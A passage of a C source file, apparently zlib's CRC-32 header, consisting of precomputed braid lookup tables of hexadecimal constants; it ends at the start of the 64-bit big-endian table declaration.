0xd659e31d, 0x1d0530b8, 0xec53826d, 0x270f51c8, 0xa19b2366, 0x6ac7f0c3, 0x77c2c07b, 0xbc9e13de, 0x3a0a6170, 0xf156b2d5, 0x03d6029b, 0xc88ad13e, 0x4e1ea390, 0x85427035, 0x9847408d, 0x531b9328, 0xd58fe186, 0x1ed33223, 0xef8580f6, 0x24d95353, 0xa24d21fd, 0x6911f258, 0x7414c2e0, 0xbf481145, 0x39dc63eb, 0xf280b04e, 0x07ac0536, 0xccf0d693, 0x4a64a43d, 0x81387798, 0x9c3d4720, 0x57619485, 0xd1f5e62b, 0x1aa9358e, 0xebff875b, 0x20a354fe, 0xa6372650, 0x6d6bf5f5, 0x706ec54d, 0xbb3216e8, 0x3da66446, 0xf6fab7e3, 0x047a07ad, 0xcf26d408, 0x49b2a6a6, 0x82ee7503, 0x9feb45bb, 0x54b7961e, 0xd223e4b0, 0x197f3715, 0xe82985c0, 0x23755665, 0xa5e124cb, 0x6ebdf76e, 0x73b8c7d6, 0xb8e41473, 0x3e7066dd, 0xf52cb578, 0x0f580a6c, 0xc404d9c9, 0x4290ab67, 0x89cc78c2, 0x94c9487a, 0x5f959bdf, 0xd901e971, 0x125d3ad4, 0xe30b8801, 0x28575ba4, 0xaec3290a, 0x659ffaaf, 0x789aca17, 0xb3c619b2, 0x35526b1c, 0xfe0eb8b9, 0x0c8e08f7, 0xc7d2db52, 0x4146a9fc, 0x8a1a7a59, 0x971f4ae1, 0x5c439944, 0xdad7ebea, 0x118b384f, 0xe0dd8a9a, 0x2b81593f, 0xad152b91, 0x6649f834, 0x7b4cc88c, 0xb0101b29, 0x36846987, 0xfdd8ba22, 0x08f40f5a, 0xc3a8dcff, 0x453cae51, 0x8e607df4, 0x93654d4c, 0x58399ee9, 0xdeadec47, 0x15f13fe2, 0xe4a78d37, 0x2ffb5e92, 0xa96f2c3c, 0x6233ff99, 0x7f36cf21, 0xb46a1c84, 0x32fe6e2a, 0xf9a2bd8f, 0x0b220dc1, 0xc07ede64, 0x46eaacca, 0x8db67f6f, 0x90b34fd7, 0x5bef9c72, 0xdd7beedc, 0x16273d79, 0xe7718fac, 0x2c2d5c09, 0xaab92ea7, 0x61e5fd02, 0x7ce0cdba, 0xb7bc1e1f, 0x31286cb1, 0xfa74bf14, 0x1eb014d8, 0xd5ecc77d, 0x5378b5d3, 0x98246676, 0x852156ce, 0x4e7d856b, 0xc8e9f7c5, 0x03b52460, 0xf2e396b5, 0x39bf4510, 0xbf2b37be, 0x7477e41b, 0x6972d4a3, 0xa22e0706, 0x24ba75a8, 0xefe6a60d, 0x1d661643, 0xd63ac5e6, 0x50aeb748, 0x9bf264ed, 0x86f75455, 0x4dab87f0, 0xcb3ff55e, 0x006326fb, 0xf135942e, 0x3a69478b, 0xbcfd3525, 0x77a1e680, 0x6aa4d638, 0xa1f8059d, 0x276c7733, 0xec30a496, 0x191c11ee, 0xd240c24b, 0x54d4b0e5, 0x9f886340, 0x828d53f8, 0x49d1805d, 0xcf45f2f3, 0x04192156, 0xf54f9383, 0x3e134026, 0xb8873288, 0x73dbe12d, 
0x6eded195, 0xa5820230, 0x2316709e, 0xe84aa33b, 0x1aca1375, 0xd196c0d0, 0x5702b27e, 0x9c5e61db, 0x815b5163, 0x4a0782c6, 0xcc93f068, 0x07cf23cd, 0xf6999118, 0x3dc542bd, 0xbb513013, 0x700de3b6, 0x6d08d30e, 0xa65400ab, 0x20c07205, 0xeb9ca1a0, 0x11e81eb4, 0xdab4cd11, 0x5c20bfbf, 0x977c6c1a, 0x8a795ca2, 0x41258f07, 0xc7b1fda9, 0x0ced2e0c, 0xfdbb9cd9, 0x36e74f7c, 0xb0733dd2, 0x7b2fee77, 0x662adecf, 0xad760d6a, 0x2be27fc4, 0xe0beac61, 0x123e1c2f, 0xd962cf8a, 0x5ff6bd24, 0x94aa6e81, 0x89af5e39, 0x42f38d9c, 0xc467ff32, 0x0f3b2c97, 0xfe6d9e42, 0x35314de7, 0xb3a53f49, 0x78f9ecec, 0x65fcdc54, 0xaea00ff1, 0x28347d5f, 0xe368aefa, 0x16441b82, 0xdd18c827, 0x5b8cba89, 0x90d0692c, 0x8dd55994, 0x46898a31, 0xc01df89f, 0x0b412b3a, 0xfa1799ef, 0x314b4a4a, 0xb7df38e4, 0x7c83eb41, 0x6186dbf9, 0xaada085c, 0x2c4e7af2, 0xe712a957, 0x15921919, 0xdececabc, 0x585ab812, 0x93066bb7, 0x8e035b0f, 0x455f88aa, 0xc3cbfa04, 0x089729a1, 0xf9c19b74, 0x329d48d1, 0xb4093a7f, 0x7f55e9da, 0x6250d962, 0xa90c0ac7, 0x2f987869, 0xe4c4abcc}, {0x00000000, 0x3d6029b0, 0x7ac05360, 0x47a07ad0, 0xf580a6c0, 0xc8e08f70, 0x8f40f5a0, 0xb220dc10, 0x30704bc1, 0x0d106271, 0x4ab018a1, 0x77d03111, 0xc5f0ed01, 0xf890c4b1, 0xbf30be61, 0x825097d1, 0x60e09782, 0x5d80be32, 0x1a20c4e2, 0x2740ed52, 0x95603142, 0xa80018f2, 0xefa06222, 0xd2c04b92, 0x5090dc43, 0x6df0f5f3, 0x2a508f23, 0x1730a693, 0xa5107a83, 0x98705333, 0xdfd029e3, 0xe2b00053, 0xc1c12f04, 0xfca106b4, 0xbb017c64, 0x866155d4, 0x344189c4, 0x0921a074, 0x4e81daa4, 0x73e1f314, 0xf1b164c5, 0xccd14d75, 0x8b7137a5, 0xb6111e15, 0x0431c205, 0x3951ebb5, 0x7ef19165, 0x4391b8d5, 0xa121b886, 0x9c419136, 0xdbe1ebe6, 0xe681c256, 0x54a11e46, 0x69c137f6, 0x2e614d26, 0x13016496, 0x9151f347, 0xac31daf7, 0xeb91a027, 0xd6f18997, 0x64d15587, 0x59b17c37, 0x1e1106e7, 0x23712f57, 0x58f35849, 0x659371f9, 0x22330b29, 0x1f532299, 0xad73fe89, 0x9013d739, 0xd7b3ade9, 0xead38459, 0x68831388, 0x55e33a38, 0x124340e8, 0x2f236958, 0x9d03b548, 0xa0639cf8, 0xe7c3e628, 0xdaa3cf98, 0x3813cfcb, 0x0573e67b, 
0x42d39cab, 0x7fb3b51b, 0xcd93690b, 0xf0f340bb, 0xb7533a6b, 0x8a3313db, 0x0863840a, 0x3503adba, 0x72a3d76a, 0x4fc3feda, 0xfde322ca, 0xc0830b7a, 0x872371aa, 0xba43581a, 0x9932774d, 0xa4525efd, 0xe3f2242d, 0xde920d9d, 0x6cb2d18d, 0x51d2f83d, 0x167282ed, 0x2b12ab5d, 0xa9423c8c, 0x9422153c, 0xd3826fec, 0xeee2465c, 0x5cc29a4c, 0x61a2b3fc, 0x2602c92c, 0x1b62e09c, 0xf9d2e0cf, 0xc4b2c97f, 0x8312b3af, 0xbe729a1f, 0x0c52460f, 0x31326fbf, 0x7692156f, 0x4bf23cdf, 0xc9a2ab0e, 0xf4c282be, 0xb362f86e, 0x8e02d1de, 0x3c220dce, 0x0142247e, 0x46e25eae, 0x7b82771e, 0xb1e6b092, 0x8c869922, 0xcb26e3f2, 0xf646ca42, 0x44661652, 0x79063fe2, 0x3ea64532, 0x03c66c82, 0x8196fb53, 0xbcf6d2e3, 0xfb56a833, 0xc6368183, 0x74165d93, 0x49767423, 0x0ed60ef3, 0x33b62743, 0xd1062710, 0xec660ea0, 0xabc67470, 0x96a65dc0, 0x248681d0, 0x19e6a860, 0x5e46d2b0, 0x6326fb00, 0xe1766cd1, 0xdc164561, 0x9bb63fb1, 0xa6d61601, 0x14f6ca11, 0x2996e3a1, 0x6e369971, 0x5356b0c1, 0x70279f96, 0x4d47b626, 0x0ae7ccf6, 0x3787e546, 0x85a73956, 0xb8c710e6, 0xff676a36, 0xc2074386, 0x4057d457, 0x7d37fde7, 0x3a978737, 0x07f7ae87, 0xb5d77297, 0x88b75b27, 0xcf1721f7, 0xf2770847, 0x10c70814, 0x2da721a4, 0x6a075b74, 0x576772c4, 0xe547aed4, 0xd8278764, 0x9f87fdb4, 0xa2e7d404, 0x20b743d5, 0x1dd76a65, 0x5a7710b5, 0x67173905, 0xd537e515, 0xe857cca5, 0xaff7b675, 0x92979fc5, 0xe915e8db, 0xd475c16b, 0x93d5bbbb, 0xaeb5920b, 0x1c954e1b, 0x21f567ab, 0x66551d7b, 0x5b3534cb, 0xd965a31a, 0xe4058aaa, 0xa3a5f07a, 0x9ec5d9ca, 0x2ce505da, 0x11852c6a, 0x562556ba, 0x6b457f0a, 0x89f57f59, 0xb49556e9, 0xf3352c39, 0xce550589, 0x7c75d999, 0x4115f029, 0x06b58af9, 0x3bd5a349, 0xb9853498, 0x84e51d28, 0xc34567f8, 0xfe254e48, 0x4c059258, 0x7165bbe8, 0x36c5c138, 0x0ba5e888, 0x28d4c7df, 0x15b4ee6f, 0x521494bf, 0x6f74bd0f, 0xdd54611f, 0xe03448af, 0xa794327f, 0x9af41bcf, 0x18a48c1e, 0x25c4a5ae, 0x6264df7e, 0x5f04f6ce, 0xed242ade, 0xd044036e, 0x97e479be, 0xaa84500e, 0x4834505d, 0x755479ed, 0x32f4033d, 0x0f942a8d, 0xbdb4f69d, 0x80d4df2d, 0xc774a5fd, 0xfa148c4d, 
0x78441b9c, 0x4524322c, 0x028448fc, 0x3fe4614c, 0x8dc4bd5c, 0xb0a494ec, 0xf704ee3c, 0xca64c78c}, {0x00000000, 0xb8bc6765, 0xaa09c88b, 0x12b5afee, 0x8f629757, 0x37def032, 0x256b5fdc, 0x9dd738b9, 0xc5b428ef, 0x7d084f8a, 0x6fbde064, 0xd7018701, 0x4ad6bfb8, 0xf26ad8dd, 0xe0df7733, 0x58631056, 0x5019579f, 0xe8a530fa, 0xfa109f14, 0x42acf871, 0xdf7bc0c8, 0x67c7a7ad, 0x75720843, 0xcdce6f26, 0x95ad7f70, 0x2d111815, 0x3fa4b7fb, 0x8718d09e, 0x1acfe827, 0xa2738f42, 0xb0c620ac, 0x087a47c9, 0xa032af3e, 0x188ec85b, 0x0a3b67b5, 0xb28700d0, 0x2f503869, 0x97ec5f0c, 0x8559f0e2, 0x3de59787, 0x658687d1, 0xdd3ae0b4, 0xcf8f4f5a, 0x7733283f, 0xeae41086, 0x525877e3, 0x40edd80d, 0xf851bf68, 0xf02bf8a1, 0x48979fc4, 0x5a22302a, 0xe29e574f, 0x7f496ff6, 0xc7f50893, 0xd540a77d, 0x6dfcc018, 0x359fd04e, 0x8d23b72b, 0x9f9618c5, 0x272a7fa0, 0xbafd4719, 0x0241207c, 0x10f48f92, 0xa848e8f7, 0x9b14583d, 0x23a83f58, 0x311d90b6, 0x89a1f7d3, 0x1476cf6a, 0xaccaa80f, 0xbe7f07e1, 0x06c36084, 0x5ea070d2, 0xe61c17b7, 0xf4a9b859, 0x4c15df3c, 0xd1c2e785, 0x697e80e0, 0x7bcb2f0e, 0xc377486b, 0xcb0d0fa2, 0x73b168c7, 0x6104c729, 0xd9b8a04c, 0x446f98f5, 0xfcd3ff90, 0xee66507e, 0x56da371b, 0x0eb9274d, 0xb6054028, 0xa4b0efc6, 0x1c0c88a3, 0x81dbb01a, 0x3967d77f, 0x2bd27891, 0x936e1ff4, 0x3b26f703, 0x839a9066, 0x912f3f88, 0x299358ed, 0xb4446054, 0x0cf80731, 0x1e4da8df, 0xa6f1cfba, 0xfe92dfec, 0x462eb889, 0x549b1767, 0xec277002, 0x71f048bb, 0xc94c2fde, 0xdbf98030, 0x6345e755, 0x6b3fa09c, 0xd383c7f9, 0xc1366817, 0x798a0f72, 0xe45d37cb, 0x5ce150ae, 0x4e54ff40, 0xf6e89825, 0xae8b8873, 0x1637ef16, 0x048240f8, 0xbc3e279d, 0x21e91f24, 0x99557841, 0x8be0d7af, 0x335cb0ca, 0xed59b63b, 0x55e5d15e, 0x47507eb0, 0xffec19d5, 0x623b216c, 0xda874609, 0xc832e9e7, 0x708e8e82, 0x28ed9ed4, 0x9051f9b1, 0x82e4565f, 0x3a58313a, 0xa78f0983, 0x1f336ee6, 0x0d86c108, 0xb53aa66d, 0xbd40e1a4, 0x05fc86c1, 0x1749292f, 0xaff54e4a, 0x322276f3, 0x8a9e1196, 0x982bbe78, 0x2097d91d, 0x78f4c94b, 0xc048ae2e, 0xd2fd01c0, 0x6a4166a5, 0xf7965e1c, 0x4f2a3979, 
0x5d9f9697, 0xe523f1f2, 0x4d6b1905, 0xf5d77e60, 0xe762d18e, 0x5fdeb6eb, 0xc2098e52, 0x7ab5e937, 0x680046d9, 0xd0bc21bc, 0x88df31ea, 0x3063568f, 0x22d6f961, 0x9a6a9e04, 0x07bda6bd, 0xbf01c1d8, 0xadb46e36, 0x15080953, 0x1d724e9a, 0xa5ce29ff, 0xb77b8611, 0x0fc7e174, 0x9210d9cd, 0x2aacbea8, 0x38191146, 0x80a57623, 0xd8c66675, 0x607a0110, 0x72cfaefe, 0xca73c99b, 0x57a4f122, 0xef189647, 0xfdad39a9, 0x45115ecc, 0x764dee06, 0xcef18963, 0xdc44268d, 0x64f841e8, 0xf92f7951, 0x41931e34, 0x5326b1da, 0xeb9ad6bf, 0xb3f9c6e9, 0x0b45a18c, 0x19f00e62, 0xa14c6907, 0x3c9b51be, 0x842736db, 0x96929935, 0x2e2efe50, 0x2654b999, 0x9ee8defc, 0x8c5d7112, 0x34e11677, 0xa9362ece, 0x118a49ab, 0x033fe645, 0xbb838120, 0xe3e09176, 0x5b5cf613, 0x49e959fd, 0xf1553e98, 0x6c820621, 0xd43e6144, 0xc68bceaa, 0x7e37a9cf, 0xd67f4138, 0x6ec3265d, 0x7c7689b3, 0xc4caeed6, 0x591dd66f, 0xe1a1b10a, 0xf3141ee4, 0x4ba87981, 0x13cb69d7, 0xab770eb2, 0xb9c2a15c, 0x017ec639, 0x9ca9fe80, 0x241599e5, 0x36a0360b, 0x8e1c516e, 0x866616a7, 0x3eda71c2, 0x2c6fde2c, 0x94d3b949, 0x090481f0, 0xb1b8e695, 0xa30d497b, 0x1bb12e1e, 0x43d23e48, 0xfb6e592d, 0xe9dbf6c3, 0x516791a6, 0xccb0a91f, 0x740cce7a, 0x66b96194, 0xde0506f1}, {0x00000000, 0x01c26a37, 0x0384d46e, 0x0246be59, 0x0709a8dc, 0x06cbc2eb, 0x048d7cb2, 0x054f1685, 0x0e1351b8, 0x0fd13b8f, 0x0d9785d6, 0x0c55efe1, 0x091af964, 0x08d89353, 0x0a9e2d0a, 0x0b5c473d, 0x1c26a370, 0x1de4c947, 0x1fa2771e, 0x1e601d29, 0x1b2f0bac, 0x1aed619b, 0x18abdfc2, 0x1969b5f5, 0x1235f2c8, 0x13f798ff, 0x11b126a6, 0x10734c91, 0x153c5a14, 0x14fe3023, 0x16b88e7a, 0x177ae44d, 0x384d46e0, 0x398f2cd7, 0x3bc9928e, 0x3a0bf8b9, 0x3f44ee3c, 0x3e86840b, 0x3cc03a52, 0x3d025065, 0x365e1758, 0x379c7d6f, 0x35dac336, 0x3418a901, 0x3157bf84, 0x3095d5b3, 0x32d36bea, 0x331101dd, 0x246be590, 0x25a98fa7, 0x27ef31fe, 0x262d5bc9, 0x23624d4c, 0x22a0277b, 0x20e69922, 0x2124f315, 0x2a78b428, 0x2bbade1f, 0x29fc6046, 0x283e0a71, 0x2d711cf4, 0x2cb376c3, 0x2ef5c89a, 0x2f37a2ad, 0x709a8dc0, 0x7158e7f7, 0x731e59ae, 0x72dc3399, 
0x7793251c, 0x76514f2b, 0x7417f172, 0x75d59b45, 0x7e89dc78, 0x7f4bb64f, 0x7d0d0816, 0x7ccf6221, 0x798074a4, 0x78421e93, 0x7a04a0ca, 0x7bc6cafd, 0x6cbc2eb0, 0x6d7e4487, 0x6f38fade, 0x6efa90e9, 0x6bb5866c, 0x6a77ec5b, 0x68315202, 0x69f33835, 0x62af7f08, 0x636d153f, 0x612bab66, 0x60e9c151, 0x65a6d7d4, 0x6464bde3, 0x662203ba, 0x67e0698d, 0x48d7cb20, 0x4915a117, 0x4b531f4e, 0x4a917579, 0x4fde63fc, 0x4e1c09cb, 0x4c5ab792, 0x4d98dda5, 0x46c49a98, 0x4706f0af, 0x45404ef6, 0x448224c1, 0x41cd3244, 0x400f5873, 0x4249e62a, 0x438b8c1d, 0x54f16850, 0x55330267, 0x5775bc3e, 0x56b7d609, 0x53f8c08c, 0x523aaabb, 0x507c14e2, 0x51be7ed5, 0x5ae239e8, 0x5b2053df, 0x5966ed86, 0x58a487b1, 0x5deb9134, 0x5c29fb03, 0x5e6f455a, 0x5fad2f6d, 0xe1351b80, 0xe0f771b7, 0xe2b1cfee, 0xe373a5d9, 0xe63cb35c, 0xe7fed96b, 0xe5b86732, 0xe47a0d05, 0xef264a38, 0xeee4200f, 0xeca29e56, 0xed60f461, 0xe82fe2e4, 0xe9ed88d3, 0xebab368a, 0xea695cbd, 0xfd13b8f0, 0xfcd1d2c7, 0xfe976c9e, 0xff5506a9, 0xfa1a102c, 0xfbd87a1b, 0xf99ec442, 0xf85cae75, 0xf300e948, 0xf2c2837f, 0xf0843d26, 0xf1465711, 0xf4094194, 0xf5cb2ba3, 0xf78d95fa, 0xf64fffcd, 0xd9785d60, 0xd8ba3757, 0xdafc890e, 0xdb3ee339, 0xde71f5bc, 0xdfb39f8b, 0xddf521d2, 0xdc374be5, 0xd76b0cd8, 0xd6a966ef, 0xd4efd8b6, 0xd52db281, 0xd062a404, 0xd1a0ce33, 0xd3e6706a, 0xd2241a5d, 0xc55efe10, 0xc49c9427, 0xc6da2a7e, 0xc7184049, 0xc25756cc, 0xc3953cfb, 0xc1d382a2, 0xc011e895, 0xcb4dafa8, 0xca8fc59f, 0xc8c97bc6, 0xc90b11f1, 0xcc440774, 0xcd866d43, 0xcfc0d31a, 0xce02b92d, 0x91af9640, 0x906dfc77, 0x922b422e, 0x93e92819, 0x96a63e9c, 0x976454ab, 0x9522eaf2, 0x94e080c5, 0x9fbcc7f8, 0x9e7eadcf, 0x9c381396, 0x9dfa79a1, 0x98b56f24, 0x99770513, 0x9b31bb4a, 0x9af3d17d, 0x8d893530, 0x8c4b5f07, 0x8e0de15e, 0x8fcf8b69, 0x8a809dec, 0x8b42f7db, 0x89044982, 0x88c623b5, 0x839a6488, 0x82580ebf, 0x801eb0e6, 0x81dcdad1, 0x8493cc54, 0x8551a663, 0x8717183a, 0x86d5720d, 0xa9e2d0a0, 0xa820ba97, 0xaa6604ce, 0xaba46ef9, 0xaeeb787c, 0xaf29124b, 0xad6fac12, 0xacadc625, 0xa7f18118, 0xa633eb2f, 
0xa4755576, 0xa5b73f41, 0xa0f829c4, 0xa13a43f3, 0xa37cfdaa, 0xa2be979d, 0xb5c473d0, 0xb40619e7, 0xb640a7be, 0xb782cd89, 0xb2cddb0c, 0xb30fb13b, 0xb1490f62, 0xb08b6555, 0xbbd72268, 0xba15485f, 0xb853f606, 0xb9919c31, 0xbcde8ab4, 0xbd1ce083, 0xbf5a5eda, 0xbe9834ed}, {0x00000000, 0x191b3141, 0x32366282, 0x2b2d53c3, 0x646cc504, 0x7d77f445, 0x565aa786, 0x4f4196c7, 0xc8d98a08, 0xd1c2bb49, 0xfaefe88a, 0xe3f4d9cb, 0xacb54f0c, 0xb5ae7e4d, 0x9e832d8e, 0x87981ccf, 0x4ac21251, 0x53d92310, 0x78f470d3, 0x61ef4192, 0x2eaed755, 0x37b5e614, 0x1c98b5d7, 0x05838496, 0x821b9859, 0x9b00a918, 0xb02dfadb, 0xa936cb9a, 0xe6775d5d, 0xff6c6c1c, 0xd4413fdf, 0xcd5a0e9e, 0x958424a2, 0x8c9f15e3, 0xa7b24620, 0xbea97761, 0xf1e8e1a6, 0xe8f3d0e7, 0xc3de8324, 0xdac5b265, 0x5d5daeaa, 0x44469feb, 0x6f6bcc28, 0x7670fd69, 0x39316bae, 0x202a5aef, 0x0b07092c, 0x121c386d, 0xdf4636f3, 0xc65d07b2, 0xed705471, 0xf46b6530, 0xbb2af3f7, 0xa231c2b6, 0x891c9175, 0x9007a034, 0x179fbcfb, 0x0e848dba, 0x25a9de79, 0x3cb2ef38, 0x73f379ff, 0x6ae848be, 0x41c51b7d, 0x58de2a3c, 0xf0794f05, 0xe9627e44, 0xc24f2d87, 0xdb541cc6, 0x94158a01, 0x8d0ebb40, 0xa623e883, 0xbf38d9c2, 0x38a0c50d, 0x21bbf44c, 0x0a96a78f, 0x138d96ce, 0x5ccc0009, 0x45d73148, 0x6efa628b, 0x77e153ca, 0xbabb5d54, 0xa3a06c15, 0x888d3fd6, 0x91960e97, 0xded79850, 0xc7cca911, 0xece1fad2, 0xf5facb93, 0x7262d75c, 0x6b79e61d, 0x4054b5de, 0x594f849f, 0x160e1258, 0x0f152319, 0x243870da, 0x3d23419b, 0x65fd6ba7, 0x7ce65ae6, 0x57cb0925, 0x4ed03864, 0x0191aea3, 0x188a9fe2, 0x33a7cc21, 0x2abcfd60, 0xad24e1af, 0xb43fd0ee, 0x9f12832d, 0x8609b26c, 0xc94824ab, 0xd05315ea, 0xfb7e4629, 0xe2657768, 0x2f3f79f6, 0x362448b7, 0x1d091b74, 0x04122a35, 0x4b53bcf2, 0x52488db3, 0x7965de70, 0x607eef31, 0xe7e6f3fe, 0xfefdc2bf, 0xd5d0917c, 0xcccba03d, 0x838a36fa, 0x9a9107bb, 0xb1bc5478, 0xa8a76539, 0x3b83984b, 0x2298a90a, 0x09b5fac9, 0x10aecb88, 0x5fef5d4f, 0x46f46c0e, 0x6dd93fcd, 0x74c20e8c, 0xf35a1243, 0xea412302, 0xc16c70c1, 0xd8774180, 0x9736d747, 0x8e2de606, 0xa500b5c5, 0xbc1b8484, 
0x71418a1a, 0x685abb5b, 0x4377e898, 0x5a6cd9d9, 0x152d4f1e, 0x0c367e5f, 0x271b2d9c, 0x3e001cdd, 0xb9980012, 0xa0833153, 0x8bae6290, 0x92b553d1, 0xddf4c516, 0xc4eff457, 0xefc2a794, 0xf6d996d5, 0xae07bce9, 0xb71c8da8, 0x9c31de6b, 0x852aef2a, 0xca6b79ed, 0xd37048ac, 0xf85d1b6f, 0xe1462a2e, 0x66de36e1, 0x7fc507a0, 0x54e85463, 0x4df36522, 0x02b2f3e5, 0x1ba9c2a4, 0x30849167, 0x299fa026, 0xe4c5aeb8, 0xfdde9ff9, 0xd6f3cc3a, 0xcfe8fd7b, 0x80a96bbc, 0x99b25afd, 0xb29f093e, 0xab84387f, 0x2c1c24b0, 0x350715f1, 0x1e2a4632, 0x07317773, 0x4870e1b4, 0x516bd0f5, 0x7a468336, 0x635db277, 0xcbfad74e, 0xd2e1e60f, 0xf9ccb5cc, 0xe0d7848d, 0xaf96124a, 0xb68d230b, 0x9da070c8, 0x84bb4189, 0x03235d46, 0x1a386c07, 0x31153fc4, 0x280e0e85, 0x674f9842, 0x7e54a903, 0x5579fac0, 0x4c62cb81, 0x8138c51f, 0x9823f45e, 0xb30ea79d, 0xaa1596dc, 0xe554001b, 0xfc4f315a, 0xd7626299, 0xce7953d8, 0x49e14f17, 0x50fa7e56, 0x7bd72d95, 0x62cc1cd4, 0x2d8d8a13, 0x3496bb52, 0x1fbbe891, 0x06a0d9d0, 0x5e7ef3ec, 0x4765c2ad, 0x6c48916e, 0x7553a02f, 0x3a1236e8, 0x230907a9, 0x0824546a, 0x113f652b, 0x96a779e4, 0x8fbc48a5, 0xa4911b66, 0xbd8a2a27, 0xf2cbbce0, 0xebd08da1, 0xc0fdde62, 0xd9e6ef23, 0x14bce1bd, 0x0da7d0fc, 0x268a833f, 0x3f91b27e, 0x70d024b9, 0x69cb15f8, 0x42e6463b, 0x5bfd777a, 0xdc656bb5, 0xc57e5af4, 0xee530937, 0xf7483876, 0xb809aeb1, 0xa1129ff0, 0x8a3fcc33, 0x9324fd72}, {0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 
0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x9630077700000000, 0x2c610eee00000000, 0xba51099900000000, 0x19c46d0700000000, 0x8ff46a7000000000, 0x35a563e900000000, 0xa395649e00000000, 0x3288db0e00000000, 0xa4b8dc7900000000, 0x1ee9d5e000000000, 0x88d9d29700000000, 0x2b4cb60900000000, 0xbd7cb17e00000000, 0x072db8e700000000, 0x911dbf9000000000, 0x6410b71d00000000, 0xf220b06a00000000, 0x4871b9f300000000, 0xde41be8400000000, 0x7dd4da1a00000000, 0xebe4dd6d00000000, 0x51b5d4f400000000, 0xc785d38300000000, 0x56986c1300000000, 0xc0a86b6400000000, 0x7af962fd00000000, 0xecc9658a00000000, 0x4f5c011400000000, 0xd96c066300000000, 0x633d0ffa00000000, 0xf50d088d00000000, 0xc8206e3b00000000, 0x5e10694c00000000, 0xe44160d500000000, 0x727167a200000000, 0xd1e4033c00000000, 0x47d4044b00000000, 0xfd850dd200000000, 0x6bb50aa500000000, 0xfaa8b53500000000, 0x6c98b24200000000, 0xd6c9bbdb00000000, 0x40f9bcac00000000, 0xe36cd83200000000, 0x755cdf4500000000, 